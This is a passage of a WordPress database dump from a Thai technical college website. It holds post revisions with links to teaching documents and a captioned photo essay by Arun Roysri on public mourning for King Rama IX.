style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>\r\n <a href=\"https://drive.google.com/drive/folders/1DPvIS_GgW189lGehlVcgYl_M_eVUwPmH?usp=sharing\">เอกสารอบรม PLC 10-11 พฤศจิกายน 2561 new</a>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-11-12 15:10:46', '2018-11-12 08:10:46', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4408, 3, '2018-11-12 15:11:29', '2018-11-12 08:11:29', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:11:29', '2018-11-12 08:11:29', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4410, 3, '2018-11-12 15:14:41', '2018-11-12 08:14:41', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" 